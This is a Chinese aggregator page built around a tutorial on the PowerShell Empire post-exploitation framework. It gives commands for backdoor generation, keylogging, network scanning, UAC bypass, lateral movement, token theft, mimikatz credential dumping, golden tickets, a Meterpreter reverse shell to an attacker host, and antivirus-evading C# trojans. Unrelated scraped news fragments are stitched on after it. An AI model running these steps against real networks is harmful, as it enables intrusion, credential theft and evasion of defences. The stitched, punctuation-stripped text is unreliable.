专栏电商日志财经减肥爱情
投稿投诉
爱情常识
搭配分娩
减肥两性
孕期塑形
财经教案
论文美文
日志体育
养生学堂
电商科学
头戴业界
专栏星座
用品音乐

PowerShellEmpire的后渗透利用

  Empire后渗透框架主要用于Windows内网渗透,该框架主要基于Powershell和Python,它提供了一个模块的架构,帮助攻击者可以创建和执行各种攻击策略,支持包括域内渗透、宏钓鱼、内网横向、权限维持、后门生成等多个模块。
  官网:http:www。powershellempire。com0x01下载安装
  安装Empire由两种方式,分别是基于源码安装和apt包安装源码安装
  在Github中下载Empiregitclonehttps:github。comEmpireProjectEmpire
  直接安装Empire会报错。setupinstall。sh
  需要安装以下Python库,当然在安装库时会遇到很多问题,以下是遇到问题后的解决方法pipinstallpyOpenSSLpipinstalliptoolspipinstallnetifacespipinstallpydispatchpipinstallpydispatcherpipinstallzlibwrapperpipinstallmacholibpipinstallxlrdpipinstallxlutilspipinstallpyminifierpipinstalldropboxpipinstallpefile
  importlib无法安装解决方法aptgetinstallbuildessentialpython3devpython2devlibssldevswig
  M2Crypto无法安装解决方法pipinstallDesktopM2Crypto0。38。0。tar。gz
  dispatch无法安装解决方法pipinstallupgradesetuptools
  CryPto。Cipher报错解决方法pipuninstallcryptopipinstallpycrypto
  下载地址:https:pypi。orgprojectM2Cryptofiles
  安装完成后成功启动Empire
  APT包安装
  使用apt包安装Empireaptinstallpowershellempirepowershellempire
  0x02基础使用设置监听器
  进入Empire输入help可查看帮助文档
  输入listeners进入监听器设置,按tab自动补全(如果不清楚均可使用该方法)
  设置http监听器uselistenerhttpinfo查看监听器信息
  在监听器模块中带有True属性的值必须填写,其他属性可能会存在默认值,使用set和unset可改变设置,首先设置监听器名为testsetNametest
  设置监听默认是80端口,但是80端口通常是Web服务器,修改端口为8080setHosthttp:172。16。54。51:8080setPort8080
  开启监听器execute
  删除监听器backlistkilltest
  生成后门
  使用usestager选择后门模块usestagerwindowslauncherbat
  设置监听器和输出目录setListenertestsetOutFiletmplanuncher。bat默认输出tmp目录execute
  在tmp目录成功找到生成后门
  把输出的后门放入目标系统中执行,执行成功后收到响应活动代理
  使用agents查看当前会话,通过interact进入会话agentsinteract22FLR8SU
  如果觉得会话名称太过复杂,可重命名会话renamewin7
  agents下可使用命令如下:
  命令执行
  查看系统信息sysinfo
  查询agents命令helpagentscmds
  执行终端命令shellwhoami
  基本功能
  使用截图功能sc
  使用键盘记录usemodulecollectionkeyloggerexecute
  使用剪切版usemodulecollectionclipboardmonitorexecute
  0x03常见模块主机扫描
  ARP扫描模块sleep0设置间隔时间usemodulesituationalawarenessnetworkarpscansetRange192。168。0。1192。168。0。100execute
  SMB扫描模块usemodulesituationalawarenessnetworksmbscannersetUserNameadministratorsetPasswordmacexecute
  端口扫描模块usemodulesituationalawarenessnetworkportscansetHosts192。168。0。1100setPorts445execute
  信息收集
  查找本地管理员主机usemodulesituationalawarenessnetworkpowerviewfindlocaladminaccessexecute
  查看共享文件usemodulesituationalawarenessnetworkpowerviewsharefinderexecute
  Windows本地信息收集usemodulesituationalawarenesshostwinenumexecute
  权限提升
  当前权限并非管理员,需要提权操作
  使用UACbypass模块提权usemoduleprivescbypassuacsetListenertestexecute
  使用powerup检查可提权项,找到后可利用环境向量提权usemoduleprivescpowerupallcheckssetListenertestexecute
  使用计划任务进行提权usemodulepersistenceelevatedschtaskssetListenertestexecute
  通过溢出漏洞提权,比如烂土豆漏洞
  usemoduleprivescms16032或usemoduleprivescms16135setListenertestexecute
  成功提权至SYSTEMagents
  0x04域内渗透环境介绍DC:192。168。52。138T1:192。168。52。128192。168。0。100D1:192。168。52。141
  当前已取得域内普通用户mac和本地管理员权限agents
  信息收集
  基础信息收集,包括系统信息、用户信息、网络环境等sysinfowhoamiinfo
  使用ARP扫描,成功找到192。168。52。024存在四台主机usemodulesituationalawarenessnetworkarpscansetRange192。168。52。024execute
  查找本地管理员usemodulesituationawarenessnetworkpowerviewfindlocaladminaccessexecute
  查看当前用户是否为其他主机上的本地管理员shelldir192。168。52。141C
  成功找到域控主机IP为192。168。52。138usemodulesituationawarenessnetworkpowerviewgetdomaincontrollerexecute
  横向移动
  使用会话注入需要管理员权限,切换本地管理员后把当前会话注入到其他主机上usemodulelateralmovementinvokepsexecsetListenertestsetComputerNamestu1execute
  使用invokewmi模块相比invokepsexec更加隐蔽usemodulelateralmovementinvokewmisetListenertestsetComputerNamestu1execute
  窃取token
  在新会话中查看进程发现域管理员进程ps
  选择目标PID号后窃取域管理员tokenstealtoken1740shelldirOWAC
  如果需要恢复原来的身份可使用以下命令revtoself
  凭证获取
  利用mimikatz拿到管理员密码明文和哈希mimikatz
  查看所有用户凭证如下:creds
  利用哈希传递可拿到域控访问权限黄金票据
  在域控下使用lsadump模块获取域内所有用户哈希usemodulecredentialsmimikatzlsadumpcreds
  成功拿到krbtgt用户哈希
  利用goldenticket制作黄金票据usemodulecredentialsmimikatzgoldenticketsetcredid10setuseradministratorexecute
  0x05会话管理会话生成
  使用spawn模块生成新会话usemodulemanagementspawnsetListenertestexecute
  进程注入
  查看进程并选择需注入的进程IDps
  成功注入winlogon进程psinjecttest1120
  注入这类系统进程不会出现蓝屏MSF会话联动
  首先在MSF中设置http监听useexploitmultihandlersetpayloadwindowsmeterpreterreversehttpsetlhost192。168。0。50setlport4444exploitj
  在Empire中设置反弹,其中payload需要与上对应usemodulecodeexecutioninvokeshellcodesetLhost192。168。0。50setLport4444setPayloadreversehttpexecute
  经测试未受到反弹shell,查阅资料后发现Empire转到MSF存在局限性,具体可查看https:www。jianshu。compc5153ee1eb760x06EmpireWeb下载安装
  Empire存在web版本,把PHP和Empire结合的方式通过网页进行访问
  下载地址:https:github。cominterferencesecurityempireweb
  下载empirewebgitclonehttps:github。cominterferencesecurityempireweb
  安装PHP扩展,需根据本机的PHP版本进行修改aptgetinstallphp7。4curl
  重启Apache后启用扩展etcinit。dapache2restart基础使用
  设置绑定端口和登录账号密码。empirerestrestport1337usernameadminpassword3mpir3admin
  访问站点输入账号密码admin3mpir3admin
  成功登录能够可视化各个模块
  查看Agents模块
  查看已获取的用户凭证
  查看文件系统
  0x07免杀模块生成csharp木马
  准备VisualStido用于编译C文件
  下载地址:http:download。microsoft。comdownloadB0FB0F589EDF1B7478C849A02C8395D0995VS2012ULTchs。iso
  生成C类型木马usestagerwindowscsharpexesetListenertestinfoexecute
  成功生成后门文件launcher。src
  csharp编译免杀
  使用VisualStdio打开cmd。sln
  需要安装。net2。0环境,打开程序与功能中的添加或删除程序安装net3。5版本,如果无法安装,打开组策略》系统〉指定可选组件安装和组件修复的设置
  。net支持:https:dotnet。microsoft。comenusdownloadvisualstudiosdks
  修改命名空间为mac123并添加花指令vara12345678;varb67890123;
  完成后编译生成程序文件
  免杀效果
  使用火绒成功免杀
  使用360成功免杀
  但是执行后360会对行为查杀,上线则不受影响
  成功进入新会话当中interactXWVH8ME2

美国历史的起点五月花号为什么说1607年在美国詹姆士镇建立的第一个英国人永久居住点时,并不是美国历史的开始,而1620年在马赛诸塞州登陆的五月花号轮船才是美国历史的真正开始呢?因为五月花号轮船上的清教徒清末旧影,老将军肩扛羽箭,清兵鼻青眼肿,李莲英一脸老年斑中国盛世,携手共进!可一百多年前,曲终人散空惆怅,一低头,一回头,泪如泉涌!一幅幅令人心碎的历史画面,被摄影机捕捉,重现了清末的真实人物。一百年的时间,当真是物是人非。缠足在历史上中英双语绘本告诉我出生时候的故事头条创作挑战赛中英双语绘本告诉我出生时候的故事唯美温馨讲述孩子zui爱的出生时候的故事,共享亲子时光用简约幽默和优美的方式讲述了和出生有关瞬间,充满感动每个孩子都是独一无二的,让孩写给十二月的一封信十二月你好别来无恙时间连个商量都没打冒冒失失地就带我来到了十二月如果给十一月做个总结跌跌撞撞,慌不择路如果给十二月做个展望战战兢兢,一动不敢动2022年的计划似乎一项都没完成就猛然战奇才十拿九稳?湖人需要注意三点,才能拿下湖人即将客场对战奇才,作为NBA传统弱旅,大部分球迷都认为湖人拿下奇才是十拿九稳的事,毕竟湖人刚刚击败联盟第二的雄鹿,势头正旺,可是湖人拿下奇才也并不容易,必须做好三点,才有机会拿杜锋不再分心,新外援到位,广东男篮多重利好迎CBA重启歇战了一个多月后,20222023赛季CBA常规赛即将在浙江诸暨赛区拉开第二阶段常规赛的大幕。一些球队抓住了短暂的调整机会更新了阵容,另一些球队则针对之前暴露出的漏洞做了总结和补缺上海男篮调整教练!李秋平走马上任,携手李春江,全力冲击前四引进了比斯利特林布尔闫鹏飞等人,结果上海男篮成为了第一阶段的笑谈,比斯利和富兰克林先后被裁,随后引进了布莱德索和奥布莱恩特。就在上海男篮出征第二阶段的时候,球队官方晒出了一段视频,软糯香甜寒凉早晨一根甜糯九玉米就给你超高幸福感天气一冷,食欲大增小时候,冬天的玉米不仅泛着浓香,同时还是个暖手宝,拿在手里,看着玉米冒出来的热气在空中升腾,胃也暖乎乎的,人就感到无比幸福掐指一算,也到囤玉米的时机了,早八人在冬孙卓回家一年姐姐孙悦做读书博主吸粉250多万放弃深圳教师编孙海洋一家五口的摆件和合照。张雅丽摄摘要去年12月6日,孙卓被找回。这一年来,孙海洋的大女儿孙悦出了本书回家14年57天,也在短视频平台上成为读书博主,最近还做了个决定放弃深圳教师国足学吧!日本临走前做最后一件事,收获所有尊重,真比中国队强北京时间12月6日,日本这次回去是不是又要拍纪录片了?淘汰赛第1场,他们点球大战24输给了克罗地亚。日本此役是要努力去创造自己队史最佳战绩的,要知道纵观日本足球历史上,他们从来就没双探花轰63分,篮网结束4连胜!杜兰特独木难支,篮网需尽快行动北京时间12月5日,NBA常规赛继续进行,篮网主场迎战凯尔特人。篮网此前13胜11负,排名东部第6,而最近一波4连胜,球队渐入佳境,乔哈回到首发后手感火热,而且沃伦复出后,篮网替补
航拍原始风貌浓郁的翁基千年布朗古寨跟着边凡看世界用镜头带你去看云南普洱景迈山原始风貌浓郁的翁基千年布朗古寨。翁基布朗族古寨历史久远,布朗族原生态文化保留和传承完整,原始风貌浓郁,自然风光秀丽,民族特色突出,被誉为千晚明第一悍将打得李自成只剩下7个兵,还差点杀了皇太极!公元1644年,崇祯皇帝自缢于煤山(今景山),大明王朝结束了长达276年的国运,至于明朝灭亡的原因,不同的人从不同的角度都能找出几点原因,归根结底其实就是四个字内忧外患。崇祯皇帝虽古代都以南方为尊,为何秦始皇陵会朝东?朕为始皇帝,后世以计数,二世三世至于万世,传之无穷!,秦始皇一生南征北战,一统六国。自称功过三皇,德高五帝,晚年修筑的秦始皇陵更是气吞山河磅礴伟岸。我们知道,在中国古代向来有以坐北陇神戎发子公司普安制药取得换发后的药品生产许可证何昱璞中国证券报中证网中证网讯(记者何昱璞)陇神戎发2月15日晚间发布公告称,公司控股子公司甘肃普安制药股份有限公司因扩建合剂生产线,以及委托陇神戎发生产宣肺止嗽合剂(国药准字Z2讲给宇宙地球的智能垃圾处理系统的核心流程是什么?塑料垃圾是一个全球性的问题,解决这个问题需要科技和政策的协同作用。在未来,有一些先进的技术可以帮助解决塑料垃圾问题,提高我们的生活质量,同时保护我们的环境。塑料垃圾则是指生产使用后南京公积金新政策,马上落地!1hr确实重磅!南京公积金,准备出手了!2023年2月3日,南京在南京市推动经济运行率先整体好转若干政策措施明确了支持提取住房公积金支付购房首付款,减轻居民首付资金周转压力。那么,9401。2万单,同比增长36!2022年网络货运情况发布2月13日,交通运输微信公众号发布消息,据交通运输部网络货运信息交互系统统计,截至2022年底,全国共有2537家网络货运企业(含分公司),整合社会零散运力594。3万辆,整合驾驶南京邮电大学研究为柔性天线家族再添一员随着物联网可穿戴设备等新兴技术蓬勃发展,由高密度金属组成的传统天线已无法满足柔性无线通信设备的需求,有针对性地设计制备具有质量轻可共形的柔性射频天线成为这一领域研究的重中之重。近日消失于互联网时代的10件事如今,我们几乎很难想象一个没有互联网的世界是什么模样。新冠疫情期间,线上生活一度不只是一种可选的生活方式,而成了我们赖以生存的世界本身。甚至在疫情后迎来的重启,都是互联网时代语言的换季了,这些叠穿搭配好看又百搭!四五十岁的女人们赶紧学起来最近,我们全国各地的气温都陆续发生变化,很多出现了倒春寒,换季的时候就是这样,忽冷忽热的,因此又被称之为尴尬的季节,这个时候我们大多数女性们是不愿意重蹈冬的臃肿,可是又要想办法抵抗气质财阀干金谁看谁心动系列美哭了!最近入手了一款颜值特别高的手链就是这一款VANA纯银仙女气质手链简约又时尚轻奢又高级夏季搭配白色的连衣裙,简直温柔感十足特别的好看。我非常喜欢这一款手链的设计,是有银杏的叶
友情链接:快好找快生活快百科快传网中准网文好找聚热点快软网